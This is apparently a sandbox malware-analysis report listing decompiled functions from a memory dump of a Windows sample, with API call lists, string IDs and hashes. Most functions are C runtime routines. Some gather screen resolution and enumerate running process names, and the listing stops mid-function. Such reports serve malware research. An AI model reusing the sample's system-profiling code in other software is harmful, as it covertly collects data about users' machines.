                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Enter__mtinitlocknum$CountInitializeSpin__amsg_exit__malloc_crt_free
                                                                                • String ID: @D
                                                                                • API String ID: 2015852156-1710841360
                                                                                • Opcode ID: 530944db4176f2cce46de6f7e99576cc982bc313fba6fff1c7fddfc863efc902
                                                                                • Instruction ID: c91d2d6b1077391c32b5af0c70127b63a248a1cb26134fbdc78a32f7d9ab27e6
                                                                                • Opcode Fuzzy Hash: 530944db4176f2cce46de6f7e99576cc982bc313fba6fff1c7fddfc863efc902
                                                                                • Instruction Fuzzy Hash: A131AF75A006219FD720DFAAE880A1DB7B5FF89324BD1412EE445877A1CB38E842CF49
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E00415D92(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t27;
                                                                                				void* _t29;
                                                                                				struct HDC__* _t41;
                                                                                				void* _t52;
                                                                                				void* _t54;
                                                                                				void* _t57;
                                                                                				void* _t61;
                                                                                
                                                                                				_t61 = __eflags;
                                                                                				_t52 = __edx;
                                                                                				_push(0x7c);
                                                                                				E004219DE(E004372A5, __ebx, __edi, __esi);
                                                                                				_t54 = __ecx;
                                                                                				 *((intOrPtr*)(_t57 - 0x88)) = 0;
                                                                                				_t41 = CreateDCA("DISPLAY", 0, 0, 0);
                                                                                				 *((intOrPtr*)(_t57 - 0x88)) = GetDeviceCaps(_t41, 8);
                                                                                				 *((intOrPtr*)(_t57 - 0x84)) = GetDeviceCaps(_t41, 0xa);
                                                                                				ReleaseDC(0, _t41);
                                                                                				_push( *((intOrPtr*)(_t57 - 0x84)));
                                                                                				 *((intOrPtr*)(_t57 - 0x84)) = E00417463(_t41, _t57 - 0x80, _t52, _t54, 0, _t61);
                                                                                				_push( *((intOrPtr*)(_t57 - 0x88)));
                                                                                				_t46 = _t57 - 0x64;
                                                                                				 *((intOrPtr*)(_t57 - 4)) = 0;
                                                                                				_t27 = E00417463(_t41, _t57 - 0x64, _t52, _t54, 0, _t61);
                                                                                				 *((char*)(_t57 - 4)) = 1;
                                                                                				_t29 = E0040D3FA(_t57 - 0x64, _t57 - 0x48, 0x43e028, _t27);
                                                                                				 *((char*)(_t57 - 4)) = 2;
                                                                                				E0040D3C3(_t46, _t57 - 0x2c, _t29, "x");
                                                                                				 *((char*)(_t57 - 4)) = 3;
                                                                                				E0040D431( *((intOrPtr*)(_t57 - 0x84)), _t54);
                                                                                				E00402C34(_t57 - 0x2c, 1, 0);
                                                                                				E00402C34(_t57 - 0x48, 1, 0);
                                                                                				E00402C34(_t57 - 0x64, 1, 0);
                                                                                				E00402C34(_t57 - 0x80, 1, 0);
                                                                                				return E00421A61(1, _t54, 0);
                                                                                			}










                                                                                0x00415d92
                                                                                0x00415d92
                                                                                0x00415d92
                                                                                0x00415d99
                                                                                0x00415da8
                                                                                0x00415daa
                                                                                0x00415db6
                                                                                0x00415dc4
                                                                                0x00415dd2
                                                                                0x00415dd8
                                                                                0x00415dde
                                                                                0x00415dec
                                                                                0x00415df2
                                                                                0x00415df8
                                                                                0x00415dfb
                                                                                0x00415dfe
                                                                                0x00415e10
                                                                                0x00415e13
                                                                                0x00415e25
                                                                                0x00415e29
                                                                                0x00415e39
                                                                                0x00415e3d
                                                                                0x00415e47
                                                                                0x00415e51
                                                                                0x00415e5b
                                                                                0x00415e65
                                                                                0x00415e71

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 00415D99
                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00415DB0
                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00415DBB
                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00415DCA
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00415DD8
                                                                                  • Part of subcall function 00417463: __EH_prolog3_GS.LIBCMT ref: 0041746D
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CapsDeviceH_prolog3_$CreateRelease_memmove
                                                                                • String ID: DISPLAY
                                                                                • API String ID: 3322158219-865373369
                                                                                • Opcode ID: 320da23f490a46f0a7e1eb9b6ab00bca2f46db6565805d5c87d081adc72a6b6f
                                                                                • Instruction ID: fff49b16c77df6326e33a8c402f58c98fb881de8dc74d5c2e94fe79e61922d8f
                                                                                • Opcode Fuzzy Hash: 320da23f490a46f0a7e1eb9b6ab00bca2f46db6565805d5c87d081adc72a6b6f
                                                                                • Instruction Fuzzy Hash: 48216571D01268ABDB25EBA5CD89EDF7F7CAF15304F10806AF109B2191DE781A48CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00417959
                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,00000000), ref: 0041796B
                                                                                • EnumProcessModules.PSAPI(00000000,?,00000004,?,?,00000000,00000000), ref: 00417982
                                                                                • GetModuleBaseNameA.PSAPI(00000000,?,?,00000104,?,00000000,00000000), ref: 00417999
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 004179A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$BaseCloseEnumHandleModuleModulesNameOpen_memset
                                                                                • String ID: <unknown>
                                                                                • API String ID: 601403599-1574992787
                                                                                • Opcode ID: 3eb3499d1e4db55d28813fab3732cc1071487513bec8fa3fb69d21c8847ffb0b
                                                                                • Instruction ID: a35a1a13da738d729f3b7ded5826a352c87bdfac010df4f83b5a5a77c2a7d370
                                                                                • Opcode Fuzzy Hash: 3eb3499d1e4db55d28813fab3732cc1071487513bec8fa3fb69d21c8847ffb0b
                                                                                • Instruction Fuzzy Hash: F51184729006089BFB21DFA5DC45BDEBBB8BF09304F004029FA14EB182DB7455488FA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E00421AA7(void* __ebx, void* __eflags, intOrPtr _a4) {
                                                                                				void* _t9;
                                                                                				char* _t11;
                                                                                				char* _t12;
                                                                                				void* _t16;
                                                                                				signed int _t17;
                                                                                				void* _t29;
                                                                                				char* _t30;
                                                                                				void* _t31;
                                                                                
                                                                                				_push(__ebx);
                                                                                				_t29 = E00427AED(__ebx);
                                                                                				if(_t29 != 0) {
                                                                                					if( *(_t29 + 0x24) != 0) {
                                                                                						L7:
                                                                                						_t30 =  *(_t29 + 0x24);
                                                                                						if(E0041E985(_t30, 0x86, E00421A7F(_a4)) != 0) {
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_t9 = E00424E89();
                                                                                							asm("int3");
                                                                                							_push(_t30);
                                                                                							_t31 = _t16;
                                                                                							if(_t31 != 0 && _t9 != 0 && _t9 != _t31) {
                                                                                								_push(0x86);
                                                                                								_t17 = 0x36;
                                                                                								 *(memcpy(_t9, _t31, _t17 << 2)) =  *_t10 & 0x00000000;
                                                                                								_t9 = E0042767D(_t10);
                                                                                							}
                                                                                							return _t9;
                                                                                						} else {
                                                                                							_t11 = _t30;
                                                                                							goto L5;
                                                                                						}
                                                                                					} else {
                                                                                						_t12 = E0042303F(0x86, 1);
                                                                                						_pop(_t16);
                                                                                						 *(_t29 + 0x24) = _t12;
                                                                                						if(_t12 != 0) {
                                                                                							goto L7;
                                                                                						} else {
                                                                                							_t11 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
                                                                                							L5:
                                                                                							goto L6;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					_t11 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
                                                                                					L6:
                                                                                					return _t11;
                                                                                				}
                                                                                			}











                                                                                0x00421aac
                                                                                0x00421ab3
                                                                                0x00421ab9
                                                                                0x00421acb
                                                                                0x00421ae8
                                                                                0x00421aeb
                                                                                0x00421b00
                                                                                0x00421b06
                                                                                0x00421b07
                                                                                0x00421b08
                                                                                0x00421b09
                                                                                0x00421b0a
                                                                                0x00421b0b
                                                                                0x00421b10
                                                                                0x00421b13
                                                                                0x00421b14
                                                                                0x00421b18
                                                                                0x00421b22
                                                                                0x00421b25
                                                                                0x00421b2a
                                                                                0x00421b2e
                                                                                0x00421b34
                                                                                0x00421b36
                                                                                0x00421b02
                                                                                0x00421b02
                                                                                0x00000000
                                                                                0x00421b02
                                                                                0x00421acd
                                                                                0x00421ad0
                                                                                0x00421ad6
                                                                                0x00421ad7
                                                                                0x00421adc
                                                                                0x00000000
                                                                                0x00421ade
                                                                                0x00421ade
                                                                                0x00421ae3
                                                                                0x00000000
                                                                                0x00421ae3
                                                                                0x00421adc
                                                                                0x00421abb
                                                                                0x00421abb
                                                                                0x00421ae4
                                                                                0x00421ae7
                                                                                0x00421ae7

                                                                                APIs
                                                                                • __getptd_noexit.LIBCMT ref: 00421AAE
                                                                                  • Part of subcall function 00427AED: GetLastError.KERNEL32(?,?,00423E60,0041E0CB,?,?,00402F66,00000010), ref: 00427AF1
                                                                                  • Part of subcall function 00427AED: ___set_flsgetvalue.LIBCMT ref: 00427AFF
                                                                                  • Part of subcall function 00427AED: __calloc_crt.LIBCMT ref: 00427B13
                                                                                  • Part of subcall function 00427AED: DecodePointer.KERNEL32(00000000,?,?,00423E60,0041E0CB,?,?,00402F66,00000010), ref: 00427B2D
                                                                                  • Part of subcall function 00427AED: GetCurrentThreadId.KERNEL32 ref: 00427B43
                                                                                  • Part of subcall function 00427AED: SetLastError.KERNEL32(00000000,?,?,00423E60,0041E0CB,?,?,00402F66,00000010), ref: 00427B5B
                                                                                • __calloc_crt.LIBCMT ref: 00421AD0
                                                                                • __get_sys_err_msg.LIBCMT ref: 00421AEE
                                                                                • _strcpy_s.LIBCMT ref: 00421AF6
                                                                                • __invoke_watson.LIBCMT ref: 00421B0B
                                                                                Strings
                                                                                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00421ABB, 00421ADE
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
                                                                                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                • API String ID: 3117964792-798102604
                                                                                • Opcode ID: 3b6c2e3c7325bf4e6ba60dde2116cbc9627c30affb51392990d5f08af89f3821
                                                                                • Instruction ID: 8e5ba2c0781951b18321fb437277fbe07dcb6d89093aa2eb5ecc7c50cc52e8fb
                                                                                • Opcode Fuzzy Hash: 3b6c2e3c7325bf4e6ba60dde2116cbc9627c30affb51392990d5f08af89f3821
                                                                                • Instruction Fuzzy Hash: 77F0247270133027DB2079677C8186BB2ACDBB472CB90043FF50893622FA2D9D01C29D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 90%
                                                                                			E00427A39(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t26;
                                                                                				intOrPtr _t30;
                                                                                				intOrPtr _t39;
                                                                                				void* _t40;
                                                                                
                                                                                				_push(8);
                                                                                				_push(0x443ee8);
                                                                                				E00424400(__ebx, __edi, __esi);
                                                                                				GetModuleHandleW(L"KERNEL32.DLL");
                                                                                				_t39 =  *((intOrPtr*)(_t40 + 8));
                                                                                				 *((intOrPtr*)(_t39 + 0x5c)) = 0x439d78;
                                                                                				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
                                                                                				 *((intOrPtr*)(_t39 + 0x14)) = 1;
                                                                                				 *((intOrPtr*)(_t39 + 0x70)) = 1;
                                                                                				 *((char*)(_t39 + 0xc8)) = 0x43;
                                                                                				 *((char*)(_t39 + 0x14b)) = 0x43;
                                                                                				 *(_t39 + 0x68) = 0x4476d0;
                                                                                				E00429078(0xd);
                                                                                				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                                                                                				InterlockedIncrement( *(_t39 + 0x68));
                                                                                				 *(_t40 - 4) = 0xfffffffe;
                                                                                				E00427ADB();
                                                                                				E00429078(0xc);
                                                                                				 *(_t40 - 4) = 1;
                                                                                				_t26 =  *((intOrPtr*)(_t40 + 0xc));
                                                                                				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
                                                                                				if(_t26 == 0) {
                                                                                					_t30 =  *0x447e38; // 0x37b1498
                                                                                					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
                                                                                				}
                                                                                				E0042767D( *((intOrPtr*)(_t39 + 0x6c)));
                                                                                				 *(_t40 - 4) = 0xfffffffe;
                                                                                				return E00424445(E00427AE4());
                                                                                			}







                                                                                0x00427a39
                                                                                0x00427a3b
                                                                                0x00427a40
                                                                                0x00427a4a
                                                                                0x00427a50
                                                                                0x00427a53
                                                                                0x00427a5a
                                                                                0x00427a61
                                                                                0x00427a64
                                                                                0x00427a67
                                                                                0x00427a6e
                                                                                0x00427a75
                                                                                0x00427a7e
                                                                                0x00427a84
                                                                                0x00427a8b
                                                                                0x00427a91
                                                                                0x00427a98
                                                                                0x00427a9f
                                                                                0x00427aa5
                                                                                0x00427aa8
                                                                                0x00427aab
                                                                                0x00427ab0
                                                                                0x00427ab2
                                                                                0x00427ab7
                                                                                0x00427ab7
                                                                                0x00427abd
                                                                                0x00427ac3
                                                                                0x00427ad4

                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00443EE8,00000008,00427B41,00000000,00000000,?,?,00423E60,0041E0CB,?,?,00402F66,00000010), ref: 00427A4A
                                                                                • __lock.LIBCMT ref: 00427A7E
                                                                                  • Part of subcall function 00429078: __mtinitlocknum.LIBCMT ref: 0042908E
                                                                                  • Part of subcall function 00429078: __amsg_exit.LIBCMT ref: 0042909A
                                                                                  • Part of subcall function 00429078: EnterCriticalSection.KERNEL32(?,?,?,00427A83,0000000D), ref: 004290A2
                                                                                • InterlockedIncrement.KERNEL32(004476D0), ref: 00427A8B
                                                                                • __lock.LIBCMT ref: 00427A9F
                                                                                • ___addlocaleref.LIBCMT ref: 00427ABD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                • String ID: KERNEL32.DLL
                                                                                • API String ID: 637971194-2576044830
                                                                                • Opcode ID: 87e45803e1f3d7438856e9eedef448d5ee7f429c962ade74b372d397880867b5
                                                                                • Instruction ID: d9ae5ec73da4cfcf12be51cb82c8a0ffbcc0e2efb6ca728e5dcb7ee9417f4179
                                                                                • Opcode Fuzzy Hash: 87e45803e1f3d7438856e9eedef448d5ee7f429c962ade74b372d397880867b5
                                                                                • Instruction Fuzzy Hash: 0101A171545B009FD720AF66E806749FBE0EF40328F60994FE496937A0CBB8AA45CF1C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 69%
                                                                                			E004231BC(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _t13;
                                                                                				void* _t16;
                                                                                				intOrPtr* _t20;
                                                                                
                                                                                				_t27 = __esi;
                                                                                				_t26 = __edi;
                                                                                				_t25 = __edx;
                                                                                				_t24 = __ebx;
                                                                                				_t13 =  *((intOrPtr*)( *_a4));
                                                                                				if(_t13 == 0xe0434352 || _t13 == 0xe0434f4d) {
                                                                                					__eflags =  *((intOrPtr*)(E00427B66(_t25, _t26, __eflags) + 0x90));
                                                                                					if(__eflags > 0) {
                                                                                						_t16 = E00427B66(_t25, _t26, __eflags);
                                                                                						_t5 = _t16 + 0x90;
                                                                                						 *_t5 =  *((intOrPtr*)(_t16 + 0x90)) - 1;
                                                                                						__eflags =  *_t5;
                                                                                					}
                                                                                					goto L6;
                                                                                				} else {
                                                                                					_t34 = _t13 - 0xe06d7363;
                                                                                					if(_t13 != 0xe06d7363) {
                                                                                						L6:
                                                                                						__eflags = 0;
                                                                                						return 0;
                                                                                					} else {
                                                                                						 *(E00427B66(__edx, __edi, _t34) + 0x90) =  *(_t17 + 0x90) & 0x00000000;
                                                                                						_push(8);
                                                                                						_push(0x444098);
                                                                                						E00424400(__ebx, __edi, __esi);
                                                                                						_t20 =  *((intOrPtr*)(E00427B66(__edx, _t26, _t34) + 0x78));
                                                                                						if(_t20 != 0) {
                                                                                							_v8 = _v8 & 0x00000000;
                                                                                							 *_t20();
                                                                                							_v8 = 0xfffffffe;
                                                                                						}
                                                                                						return E00424445(E00423EA4(_t24, _t25, _t26, _t27));
                                                                                					}
                                                                                				}
                                                                                			}







                                                                                0x004231bc
                                                                                0x004231bc
                                                                                0x004231bc
                                                                                0x004231bc
                                                                                0x004231c6
                                                                                0x004231cd
                                                                                0x004231f3
                                                                                0x004231fa
                                                                                0x004231fc
                                                                                0x00423201
                                                                                0x00423201
                                                                                0x00423201
                                                                                0x00423201
                                                                                0x00000000
                                                                                0x004231d6
                                                                                0x004231d6
                                                                                0x004231db
                                                                                0x00423207
                                                                                0x00423207
                                                                                0x0042320a
                                                                                0x004231dd
                                                                                0x004231e2
                                                                                0x0042bb0a
                                                                                0x0042bb0c
                                                                                0x0042bb11
                                                                                0x0042bb1b
                                                                                0x0042bb20
                                                                                0x0042bb22
                                                                                0x0042bb26
                                                                                0x0042bb31
                                                                                0x0042bb31
                                                                                0x0042bb42
                                                                                0x0042bb42
                                                                                0x004231db

                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 004231DD
                                                                                  • Part of subcall function 00427B66: __getptd_noexit.LIBCMT ref: 00427B69
                                                                                  • Part of subcall function 00427B66: __amsg_exit.LIBCMT ref: 00427B76
                                                                                • __getptd.LIBCMT ref: 004231EE
                                                                                • __getptd.LIBCMT ref: 004231FC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                • String ID: MOC$RCC$csm
                                                                                • API String ID: 803148776-2671469338
                                                                                • Opcode ID: 1a40ab436ba34b118fcaeefa4d19f027c894b46aefca6e8869e0263b13f09841
                                                                                • Instruction ID: 5e88a8db040453f8efaeaef49caf4d6117122b5f792fcabfa7a92a085072d785
                                                                                • Opcode Fuzzy Hash: 1a40ab436ba34b118fcaeefa4d19f027c894b46aefca6e8869e0263b13f09841
                                                                                • Instruction Fuzzy Hash: B3E0ED317041248FC7209B69E08AB793AA4AB4531DF9504A7A51CCB322C72DAA50855A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
                                                                                			E0040DBBA(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				char* _t239;
                                                                                				char* _t242;
                                                                                				char* _t269;
                                                                                				char* _t270;
                                                                                				char* _t271;
                                                                                				intOrPtr _t301;
                                                                                				void* _t303;
                                                                                				void* _t305;
                                                                                				void* _t306;
                                                                                				intOrPtr _t307;
                                                                                				intOrPtr _t308;
                                                                                				intOrPtr _t309;
                                                                                				char* _t310;
                                                                                				intOrPtr _t311;
                                                                                				intOrPtr _t312;
                                                                                				char* _t313;
                                                                                				intOrPtr _t314;
                                                                                				intOrPtr _t315;
                                                                                				intOrPtr _t316;
                                                                                				intOrPtr _t317;
                                                                                				intOrPtr _t318;
                                                                                				intOrPtr _t319;
                                                                                				intOrPtr _t320;
                                                                                				intOrPtr _t321;
                                                                                				intOrPtr _t322;
                                                                                				intOrPtr _t323;
                                                                                				intOrPtr _t324;
                                                                                				intOrPtr _t325;
                                                                                				intOrPtr _t326;
                                                                                				intOrPtr _t327;
                                                                                				intOrPtr _t328;
                                                                                				intOrPtr _t329;
                                                                                				intOrPtr _t330;
                                                                                				intOrPtr _t331;
                                                                                				intOrPtr _t332;
                                                                                				intOrPtr _t333;
                                                                                				intOrPtr _t334;
                                                                                				intOrPtr _t335;
                                                                                				intOrPtr _t336;
                                                                                				intOrPtr _t337;
                                                                                				intOrPtr _t338;
                                                                                				intOrPtr _t339;
                                                                                				char* _t340;
                                                                                				char* _t341;
                                                                                				char* _t342;
                                                                                				intOrPtr _t343;
                                                                                				intOrPtr _t344;
                                                                                				intOrPtr _t345;
                                                                                				intOrPtr _t346;
                                                                                				intOrPtr _t347;
                                                                                				intOrPtr _t348;
                                                                                				intOrPtr _t349;
                                                                                				intOrPtr _t350;
                                                                                				intOrPtr _t351;
                                                                                				intOrPtr _t352;
                                                                                				intOrPtr _t353;
                                                                                				intOrPtr _t354;
                                                                                				intOrPtr _t355;
                                                                                				intOrPtr _t356;
                                                                                				intOrPtr _t357;
                                                                                				intOrPtr _t358;
                                                                                				intOrPtr _t359;
                                                                                				intOrPtr _t360;
                                                                                				intOrPtr _t361;
                                                                                				intOrPtr _t362;
                                                                                				intOrPtr _t363;
                                                                                				intOrPtr _t364;
                                                                                				intOrPtr _t365;
                                                                                				intOrPtr _t366;
                                                                                				intOrPtr _t367;
                                                                                				intOrPtr _t368;
                                                                                
                                                                                				_push(0x10);
                                                                                				E00421975(E004374C9, __ebx, __edi, __esi);
                                                                                				_t303 = __ecx;
                                                                                				 *((intOrPtr*)(_t305 - 4)) = 0;
                                                                                				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
                                                                                				E00403C13(__ecx, _t305 + 8, 0, 0xffffffff);
                                                                                				_t307 = _t306 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t307;
                                                                                				E0040C606(_t307,  *0x449cf4);
                                                                                				_t308 = _t307 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 1;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t308;
                                                                                				E0040C606(_t308,  *0x449cc4);
                                                                                				_t309 = _t308 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 2;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t309;
                                                                                				E0040C606(_t309,  *0x449e18);
                                                                                				_push(0);
                                                                                				_push(__ecx);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, __edi, __ecx, 0);
                                                                                				_t310 = _t309 - 0x1c;
                                                                                				_t239 = _t310;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t310;
                                                                                				_t301 = 0xf;
                                                                                				 *((intOrPtr*)(_t239 + 0x14)) = _t301;
                                                                                				 *((intOrPtr*)(_t239 + 0x10)) = 0;
                                                                                				 *_t239 = 0;
                                                                                				E0040381A(_t239, 0x441200);
                                                                                				_t311 = _t310 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 3;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t311;
                                                                                				E0040C606(_t311,  *0x449d80);
                                                                                				_t312 = _t311 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 4;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t312;
                                                                                				E0040C606(_t312,  *0x449dfc);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t313 = _t312 - 0x1c;
                                                                                				_t242 = _t313;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t313;
                                                                                				 *((intOrPtr*)(_t242 + 0x14)) = _t301;
                                                                                				 *((intOrPtr*)(_t242 + 0x10)) = 0;
                                                                                				 *_t242 = 0;
                                                                                				E0040381A(_t242, 0x441200);
                                                                                				_t314 = _t313 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 5;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t314;
                                                                                				E0040C606(_t314,  *0x449cb8);
                                                                                				_t315 = _t314 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 6;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t315;
                                                                                				E0040C606(_t315,  *0x449ca8);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t316 = _t315 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t316;
                                                                                				E0040C606(_t316,  *0x449f94);
                                                                                				_t317 = _t316 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 7;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t317;
                                                                                				E0040C606(_t317,  *0x449c54);
                                                                                				_t318 = _t317 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 8;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t318;
                                                                                				E0040C606(_t318,  *0x449ee4);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t319 = _t318 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t319;
                                                                                				E0040C606(_t319,  *0x449d70);
                                                                                				_t320 = _t319 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 9;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t320;
                                                                                				E0040C606(_t320,  *0x449c54);
                                                                                				_t321 = _t320 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0xa;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t321;
                                                                                				E0040C606(_t321,  *0x449ee4);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t322 = _t321 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t322;
                                                                                				E0040C606(_t322,  *0x449e24);
                                                                                				_t323 = _t322 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0xb;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t323;
                                                                                				E0040C606(_t323,  *0x449c54);
                                                                                				_t324 = _t323 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0xc;
